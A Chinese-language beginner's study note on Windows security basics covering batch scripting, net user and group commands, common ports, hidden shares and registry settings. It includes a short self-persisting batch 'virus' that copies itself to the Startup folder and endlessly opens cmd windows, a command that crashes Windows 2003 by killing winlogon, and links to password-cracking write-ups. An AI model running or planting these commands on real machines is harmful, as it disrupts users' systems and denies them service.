网络安全简记
一、批处理
1. 如何创建批处理:
创建一个.txt文件,然后将后缀名改为.bat,此文件即为批处理文件。
输入简单的命令:
echo 用来屏蔽处理过程
@echo off
color 0a
title my first demo
echo ========
echo hello,im shuaige
echo =======
pause
echo 此命令为空一行的命令
echo.
echo laji is cleaning.....
echo 以下命令用作延时
ping -n 3 127.0.0.1>nul
pause
echo.
echo userprofile是系统变量,表示的是系统当前登录的用户
echo %userprofile%
pause
echo set命令用来设置变量,与/p结合用来等待获取用户输入的值
set /p time=请输入时间
echo 引用变量的方式 %time%
echo %time%
注意:如果创建的文件编码格式不是UTF-8,则打开.bat文件时,会一闪而过,并不会执行pause 暂停;
2. :编号 处理块的使用
简单的对以下代码进行讲解,代码分为3块,:1/2/3代表的是代码块的编号,其中goto语句用来跳转到指定的语句块。
:1
.....
goto 3
:2
....
:3
...
根据以上知识点,构造一个简单的病毒(无限打开cmd窗口),放在启动文件夹(打开方式:shell:startup)中(务必不能在自己本地计算机上运行,可以自己下个虚拟机试验下)
copy xx.bat %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
:d
start
goto d
3. 其他命令
以下命令是蓝屏操作(针对Windows2003的蓝屏命令),原因是命令操作要求杀死winlogon进程,但是此进程又要被使用。
winlogon.exe 是Windows NT 用户登陆程序,用于管理用户登录和退出
ntsd -c q -pn winlogon.exe
任务进程 杀死指定的进程 进程名 /f表示强制杀死
explorer.exe 桌面显示进程
taskkill /im explorer.exe /f
启动桌面显示进程
start c:\windows\explorer.exe
二、用户和组
1.概述
- 一个服务器可以登陆多个用户,不用的用户登入系统后,拥有不同的权限;
- 每个账户有自己唯一的SID(安全标示符)
SID: S-1-5-21-426206823-2544445452-145525364-500(系统ID和用户ID(最后一个,500固定是admin,用户1000起)) - 存储位置: c:\windows\system32\config\SAM SAM文件由hash算法加密生成的存储文件
- windows系统上,默认密码最长有效期为42天
2.内置账户
给人使用的账户:
administrator #管理员账户
guest #来宾账户
计算机服务组件相关的系统账户
system #系统账户== 权限至高无上
local services #本地服务账户 == 权限为普通用
network services #网络服务账户 == 权限为普通用户
3.命令操作用户
echo 列出用户列表
net user
echo 列出用户详细信息
net user administrator
echo 修改用户密码(管理员用户操作)
net user yonghu 1
echo 新增普通用户(账户名是abc,密码是123)
net user adc 123 /add
echo 删除用户
net user adc /del
echo 激活或者禁用账户
net user 用户名 /active:yes or /active:no
4.组概述
组的作用:简化权限的赋予。
符权限方式:
内置组:内置组的权限默认被系统赋予。
1) administrators # 管理员组
2) guests # 来宾组
3) users # 普通用户组,默认新建用户
4) network # 网络配置组
5) print # 打印机组
6) Remote Desktop #远程桌面组
echo 列出所有的组策略
net localgroup
echo 新建空的组策略
net localgroup ceos /add
echo 查看组策略下的成员
net localgroup administrators
echo 在组策略下添加相应的用户
net localgroup administrators yonhu /add
3、常用命令及服务的端口
echo 查看本机开放的所有端口
netstat -an
常用的服务的默认端口
telnet: 23
远程桌面协议RDP: 3389
共享服务器的端口:445
DHCP服务的端口:67/68
共享文件夹的相关命令如下
echo 创建共享(隐藏类型)
net share share$=D:\share
echo 列出共享盘
net share
windows 默认的盘符是开启共享的
echo 关闭方式(此次关闭生效,重启后失效)
net share c$ /del
net share d$ /del
echo 关闭方式(永久关闭)
echo 将关闭方式的命名放在批处理中,批处理放在windows 的自启动目录下
echo 另一种方式是改注册表,如下方法
一、注册表关闭share 方法
“开始”→“运行”输入“regedit”确定后,打开注册表编辑器,找到“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters”项,双击右侧窗口中的“AutoShareServer”项将键值由1改为0,这样就能关闭硬盘各分区的共享。如果没有AutoShareServer项,可自己新建一个再改键值。
注意:本法必须重启机器,但一经改动就会永远停止共享。
注册表
注册表:公安系统的户籍科,电脑上每装一个软件,软件的相关信息必须在注册表上注册。注册表也会记录系统的账户信息等。
4、常见的安全漏洞
参考如下博客:
博客名: 攻击 | 破解windows7密码(利用5次shift漏洞破解win7密码)
链接: https://blog.csdn.net/weixin_44421798/article/details/100405496.
参考如下博客:
博客名:攻击 | 破解windows7密码(利用PE系统破解XP密码)
链接: https://blog.csdn.net/weixin_44421798/article/details/100421368.
或
链接: https://blog.csdn.net/m0_47253594/article/details/106339011
5、共享文件夹的权限设置
6、隐藏共享文件夹的设置
文件夹的共享名设为 XX$ 时,此时此共享文件夹对外不显示,只能利用IP+XX$的形式显示的调用。